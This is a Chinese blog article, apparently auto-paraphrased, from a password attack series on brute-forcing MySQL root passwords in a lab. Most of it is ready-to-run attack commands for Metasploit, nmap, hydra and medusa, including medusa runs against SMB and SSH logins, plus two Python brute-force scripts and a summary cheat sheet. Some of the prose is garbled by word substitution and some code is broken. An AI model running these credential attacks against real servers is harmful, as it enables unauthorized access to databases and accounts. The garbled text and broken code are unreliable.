首页 » Web前端 » phpnt账号技巧_密码攻防系列文章6做事器MySQL账号扫描及进击

phpnt账号技巧_密码攻防系列文章6做事器MySQL账号扫描及进击

duote123 2024-11-27 0

扫一扫用手机浏览

文章目录 [+]

1.测试环境:Windows 2003 Server +PHP+MySQL5.0.90-community-nt

2.账号设置:许可远程访问也即设置host为%,同时密码设置为11111111。

phpnt账号技巧_密码攻防系列文章6做事器MySQL账号扫描及进击

3.测试机:kali linux2017和windows 2003

phpnt账号技巧_密码攻防系列文章6做事器MySQL账号扫描及进击
(图片来自网络侵删)
1.1 Metasploit扫描MySQL口令

有关利用Metasploit扫描详细利用可以参考本人网上发布的《利用Msf赞助模块检测和渗透Mysql》,这里紧张是先容如何扫描MySQL口令。

1.启动Metasploit命令

在kali终端下输入:msfconsole

2. 密码扫描auxiliary/scanner/mysql/mysql_login模块

(1)单一模式扫描登录验证

use auxiliary/scanner/mysql/mysql_login

set rhosts 192.168.157.130

set username root

set password 11111111

run

(2)利用字典对某个IP地址进行暴力破解

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 192.168.157.130

set pass_file “/root/top10000pwd.txt”

set username root

run

测试效果如图1所示,把稳如果字典过长,其扫描韶光也会相应较长,也即等待韶光会较长,在扫描结果汇总可以看到-+符号,-表示未成功,绿色的+表示口令破解成功,并显示用户名和密码。
如果是对某个IP地址段,则设置set RHOSTS 192.168.157.1-254即可。

图1利用字典扫描

3.密码验证

use auxiliary/admin/mysql/mysql_sql

set RHOSTS 192.168.157.130

set password 11111111

set username root

run

该模块紧张利用设置的用户名和密码对主机进行登录验证,查询版本信息,如图2所示。

图2登录验证

在msf下面有关更多的mysql利用,可以利用search mysql命令,然后选择对应的模块,通过info模块查看,通过set进行参数设置,通过run进行测试。

1.2NMAP扫描MySQL口令

1.查看Nmap下有关mysql利用脚本

ls -al /usr/share/nmap/scripts/mysql

/usr/share/nmap/scripts/mysql-audit.nse

/usr/share/nmap/scripts/mysql-brute.nse

/usr/share/nmap/scripts/mysql-databases.nse

/usr/share/nmap/scripts/mysql-dump-hashes.nse

/usr/share/nmap/scripts/mysql-empty-password.nse

/usr/share/nmap/scripts/mysql-enum.nse

/usr/share/nmap/scripts/mysql-info.nse

/usr/share/nmap/scripts/mysql-query.nse

/usr/share/nmap/scripts/mysql-users.nse

/usr/share/nmap/scripts/mysql-variables.nse

/usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse

可以看到有多个mysql干系脚本,有审计,暴力破解,hash、空密码扫描、列举、基本信息、查询、变量等。
个中/usr/share/nmap/scripts/mysql-brute.nse和/usr/share/nmap/scripts/mysql-empty-password.nse用于密码扫描。

1.利用nmap扫描确认端口信息

利用命令nmap -p 3306 192.168.157.130进行扫描,如图3所示,可以看到192.168.157.130打算机端口开放3306。

图3扫描端口

2.对开放3306端口的数据库进行扫描破解

(1)扫描空口令

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.130

(2)扫描已知口令

nmap -sV --script=mysql-databases --script-args dbuser=root,dbpass=11111111 192.168.195.130

nmap扫描端口和banner标识效果比较好,对空口令的支持效果也可以,暴力破解比较坑。
更多nmap扫描脚本参数详细情形,请参考:

https://nmap.org/nsedoc/lib/brute.html#script-args

1.3利用xHydra和Hydra破解MySQL口令

Hydra是linux下面一款非常厉害的密码暴力破解工具,支持多种协议破解,一样平常是在命令行下进行破解,在kali2017版本中已经有图形界面版xHydra。
下载地址:https://github.com/maaaaz/thc-hydra-windows

1.利用xHydra暴力破解MySQL密码

(1)设置目标地址和须要破解的协议

在kali中单击“Application”-“05-Password Attacks”-“Online Attacks”-“hydra-gtk”打开Hydra图形界面版,如图4所示,在Target中设置单一目标(Single Target):192.168.157.130,如果是多个目标,这可以保存在文本文件中,通过Target List进行设置。
在其Protocol中选择Mysql协议。

图4设置目标地址

(2)设置密码或者密码文件

单击“Password”标签,在username中输入root或者其它账号名称,或者选择用户名称列表(Username List),如图5所示。
跟username设置一样,设置用户密码,还可以设置以用户名为密码进行登录,以空密码进行登录,以密码反转进行登录等。

图5设置用户名及密码

(3)开始暴力破解

在开始暴力破解前,还可以设置线程数,在“Tuning”中设置,如果采取默认,则单击“start”标签,如图6所示,单击start按钮,开始进行暴力破解,如果暴力破解成功,则会在其下方以粗体字显示信息。

图6破解成功

2.利用hydra进行暴力破解

(1)单一用户名和密码进行验证破解

已知目标root账号,密码11111111,主机地址192.168.157.130,则利用如下命令即可:

hydra -l root -p11111111 -t 16 192.168.157.130 mysql

如图7所示,破解成功后,会以绿色字体显示破解结果。

图7利用hydra破解mysql密码

(2)利用字典破解单一用户

hydra -l root -P /root/Desktop/top10000pwd.txt -t 16 192.168.157.130 mysql

跟上面类似,利用字典则利用大写的P,利用密码则是小写p后更密码值。
如果是多个用户列表,则是利用L filename,例如L /root/user.txt,“-t”表示线程数。

(3)对多个IP地址进行root账号密码破解

密码文件为/root/newpass.txt,目标文件/root/ip.txt,登录账号为root,则命令为:

hydra -l root -P /root/newpass.txt -t 16 -M /root/ip.txt mysql

如图8所示,在本例中对192.168.157.130、192.168.157.131、192.168.157.132进行暴力破解,由于192.168.157.131和192.168.157.132未供应3306做事,以是显示无法连接,终极破解了一个密码。

图8破解多个目标MySQL密码

1.4利用hscan扫描MySQL口令

Hscan是一款老牌的黑客攻击,其利用很大略,须要通过menu去设置扫描参数(parameter)startip:192.168.157.1,endip:192.168.157.254,然后选择模块(Modules)进行配置,选择MySQL弱口令检讨即可,如图9所示,设置好后,单击start即可开始扫描。
在软件左边会显示扫描信息,扫描完成后会在程序目录下的report天生网页的报告文件,如果有结果也会在log文件夹下天生扫描日志文件。
该软件对root空口令扫描效果较好,对实际密码扫描效果一样平常。

图9利用hscan扫描MySQL弱口令

1.5利用xsqlscanner扫描MySQL口令

软件须要.net framework 4.0支持,xsqlscanner是国外开拓的一款软件,如图10所示,须要设置IP地址和SQL审计方法、做事器类型和文件选项,经由实际测试,效果并不理想,扫描过程涌现程序无法相应,扫描速率偏慢,通过其利用帮助来看该软件该当对MSSQL扫描效果比较好。

图10利用xsqlscanner扫描MySQL口令

1.6利用Bruter扫描MySQL口令

Bruter是一款支持MySQL、MySQL、SSH等协议的暴力破解工具,其设置非常大略,须要设置目标,协议,端口,用户,字典,如图11所示,进行设置,然后单击开始即可进行暴力破解,破解成功后会在结果中显示,适宜单个主机快速验证,比较直不雅观。

图11Bruter暴力破解MySQL密码

1.7利用Medusa(美杜莎)MySQL口令

1. Medusa简介

Medusa(美杜莎)是一个速率快,支持大规模并行,模块化,爆破登录。
可以同时对多个主机,用户或密码实行强力测试。
Medusa和hydra一样,同样属于在线密码破解工具。
不同的是,medusa 的稳定性相较于hydra 要好很多,但其支持模块要比 hydra 少一些。
Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),

NNTP, PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT, SMTP

(AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具,官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。
目前最新版本2.2,美中不敷的是软件从2015年后未进行更新,kali默认自带该软件,软件下载地址:

https://github.com/jmk-foofus/medusa

https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

2.用法

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] 目标主机名称或者IP地址

-H [FILE] 包含目标主机名称或者IP地址文件

-u [TEXT] 测试的用户名

-U [FILE] 包含测试的用户名文件

-p [TEXT] 测试的密码

-P [FILE] 包含测试的密码文件

-C [FILE] 组合条款文件

-O [FILE] 日志信息文件

-e [n/s/ns] n代表空密码,s代表为密码与用户名相同

-M [TEXT] 模块实行名称

-m [TEXT] 通报参数到模块

-d 显示所有的模块名称

-n [NUM] 利用非默认Tcp端口

-s 启用SSL

-r [NUM] 重试间隔韶光,默认为3秒

-t [NUM] 设定线程数量

-T 同时测试的主机总数

-L 并行化,每个用户利用一个线程

-f 在任何主机上找到第一个账号/密码后,停滞破解

-F 在任何主机上找到第一个有效的用户名/密码后停滞审计。

-q 显示模块的利用信息

-v [NUM] 详细级别(0-6)

-w [NUM] 缺点调试级别(0-10)

-V 显示版本

-Z [TEXT] 连续扫描上一次

3.破解MySQL密码

(1)利用字典文件破解192.168.17.129主机root账号密码

medusa -M mysql -h192.168.17.129 -e ns -F -u root -P /root/mypass.txt

参数-M表示MySQL数据库密码破解,-h指定主机IP地址或者名称,-e ns破解空口令和主机名称相同的用户密码,-F破解成功后急速停滞,-u指定root账号,-P指定密码文件为/root/mypass.txt,破解效果如图12所示。

图12 medusa破解单一MySQL做事器密码

(2)破解IP地址段MySQL密码

medusa -M mysql -H host.txt -e ns -F -u root -P /root/mypass.txt

在前面的根本上,变动前面的密码为12345678:

GRANT USAGE,SELECT, INSERT, UPDATE, DELETE, SHOW VIEW ,CREATE TEMPORARY TABLES,EXECUTE ON . TO root@'192.168.17.144' IDENTIFIED BY '12345678';

FLUSH PRIVILEGES;

再次进行测试,效果如图13所示。

图13破解多个主机的Mysql密码

4.破解其它密码

(1)破解smbnt

medusa -M smbnt -h 192.168.17.129 -u administrator -P /root/mypass.txt -e ns -F

(2)破解ssh密码

medusa -M ssh -h 192.168.17.129 -u root -P /root/mypass.txt -e ns -F

1.8python脚本暴力破解MySQL口令

1. Python版本Mysql爆破大略密码小脚本

须要安装Python插件MySQL-python,插件下载地址:

https://pypi.python.org/packages/a5/e9/51b544da85a36a68debe7a7091f068d802fc515a3a202652828c73453cad/MySQL-python-1.2.5.zip,将以下代码保存为:MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 实行 MysqlDatabaseBlasting.py即可开始破解。

import MySQLdb

#coding=gbk

#目标IP mysql数据库必须开启3360远程上岸端口

mysql_username = ('root','test', 'admin', 'user')#账号字典

common_weak_password = ('','123456','test','root','admin','user')#密码字典

success = False

host = "127.0.0.1"#数据库IP地址

port = 3306

for username in mysql_username:

for password in common_weak_password:

try:

db = MySQLdb.connect(host, username, password)

success = True

if success:

print username, password

except Exception, e:

pass

2. “独自等待”写的MySQL暴力破解工具单线程版

利用本工具前,请确保脚本同目录下存在user.txt,pass.txt两个文件,用法:

mysqlbrute.py 待破解的ip/domain 端口 数据库 用户名列表 密码列表

实例: mysqlbrute.py www.waitalone.cn 3306 test user.txt pass.txt

程序须要MySQLdb支持,下载地址http://www.codegood.com/download/11/

mysqlbrute.py文件代码:

#!/usr/bin/env python

# -- coding: gbk --

# -- coding: utf-8 --

# Date: 2014/11/10

# Created by 独自等待

# 博客 http://www.waitalone.cn/

import os, sys, re, socket, time

try:

import MySQLdb

except ImportError:

print '\n[!] MySQLdb模块导入缺点,请到下面网址下载:'

print '[!] http://www.codegood.com/archives/129'

exit()

def usage():

print '+' + '-' 50 + '+'

print '\t Python MySQL暴力破解工具单线程版'

print '\t Blog:http://www.waitalone.cn/'

print '\t\t Code BY: 独自等待'

print '\t\t Time:2014-11-10'

print '+' + '-' 50 + '+'

if len(sys.argv) != 6:

print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain 端口 数据库 用户名列表 密码列表"

print "实例: " + os.path.basename(sys.argv[0]) + " www.waitalone.cn 3306 test user.txt pass.txt"

sys.exit()

def mysql_brute(user, password):

"mysql数据库破解函数"

db = None

try:

# print "user:", user, "password:", password

db = MySQLdb.connect(host=host, user=user, passwd=password, db=sys.argv[3], port=int(sys.argv[2]))

# print '[+] 破解成功:', user, password

result.append('用户名:' + user + "\t密码:" + password)

except KeyboardInterrupt:

print '大爷,按您的嘱咐,已成功退出程序!'

exit()

except MySQLdb.Error, msg:

# print '未知缺点大爷:', msg

pass

finally:

if db:

db.close()

if __name__ == '__main__':

usage()

start_time = time.time()

if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):

host = sys.argv[1]

else:

host = socket.gethostbyname(sys.argv[1])

userlist = [i.rstrip() for i in open(sys.argv[4])]

passlist = [j.rstrip() for j in open(sys.argv[5])]

print '\n[+] 目 标:%s \n' % sys.argv[1]

print '[+] 用户名:%d 条\n' % len(userlist)

print '[+] 密 码:%d 条\n' % len(passlist)

print '[!] 密码破解中,请稍候……\n'

result = []

for x in userlist:

for j in passlist:

mysql_brute(x, j)

if len(result) != 0:

print '[+] 恭喜大爷,MySQL密码破解成功!\n'

for x in {}.fromkeys(result).keys():

print x + '\n'

else:

print '[-] 杯具了大爷,MySQL密码破解失落败!\n'

print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)

1.9扫描总结

1.好用的工具

通过实际测试MSF、xHydra、Hydra、Bruter、Medusa都能很好的对MySQL口令进行暴力破解,个中Msf平台具有综合功能,在暴力破解成功后可以连续进行渗透。
xHydra、Hydra和Medusa支持多地址破解,Bruter对单一密码漏洞验证效果比较快。

2.工具命令总结

(1)Msf单一模式扫描登录验证

use auxiliary/scanner/mysql/mysql_login

set rhosts 192.168.157.130

set username root

set password 11111111

run

(2)Msf利用字典对某个IP地址进行暴力破解

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 192.168.157.130

set pass_file “/root/top10000pwd.txt”

set username root

run

(3)msf密码验证

use auxiliary/admin/mysql/mysql_sql

set RHOSTS 192.168.157.130

set password 11111111

set username root

run

(4)hydra单一用户名和密码进行验证破解

hydra -l root -p11111111 -t 16 192.168.157.130 mysql

(5)hydra利用字典破解单一用户

hydra -l root -P /root/Desktop/top10000pwd.txt -t 16 192.168.157.130 mysql

(6)hydra对多个IP地址进行root账号密码破解

hydra -l root -P /root/newpass.txt -t 16 -M /root/ip.txt mysql

(7)medusa利用字典文件破解192.168.17.129主机root账号密码

medusa -M mysql -h192.168.17.129 -e ns -F -u root -P /root/mypass.txt

(8)medusa破解IP地址段MySQL密码

medusa -M mysql -H host.txt -e ns -F -u root -P /root/mypass.txt

标签:

相关文章

今日头条算法如何实现个化推荐与精准传播

信息传播方式发生了翻天覆地的变化。今日头条作为国内领先的信息分发平台,凭借其强大的算法推荐系统,吸引了海量用户。今日头条的算法究竟...

Web前端 2025-01-31 阅读1 评论0

今日头条算法关闭之谜内容分发新格局

今日头条作为一款备受瞩目的新闻资讯平台,凭借其独特的算法推荐机制,吸引了大量用户。近期有关今日头条算法关闭的消息引发了广泛关注。本...

Web前端 2025-01-31 阅读1 评论0

今日头条算法智能推荐背后的科技魅力

信息爆炸的时代已经到来。人们每天在互联网上接触到海量的信息,如何从中筛选出有价值的内容,成为了人们关注的焦点。今日头条作为一款智能...

Web前端 2025-01-31 阅读1 评论0

今日头条算法专利申请个化推荐的秘密武器

信息爆炸的时代已经来临。在众多信息中,如何快速找到自己感兴趣的内容成为了一个难题。今日头条作为中国领先的资讯平台,凭借其独特的算法...

Web前端 2025-01-31 阅读1 评论0

今日头条算法机器推荐模式的秘密与挑战

大数据、人工智能等新兴技术的应用已经渗透到我们生活的方方面面。在信息爆炸的时代,人们获取信息的渠道越来越丰富,如何在海量信息中找到...

Web前端 2025-01-31 阅读1 评论0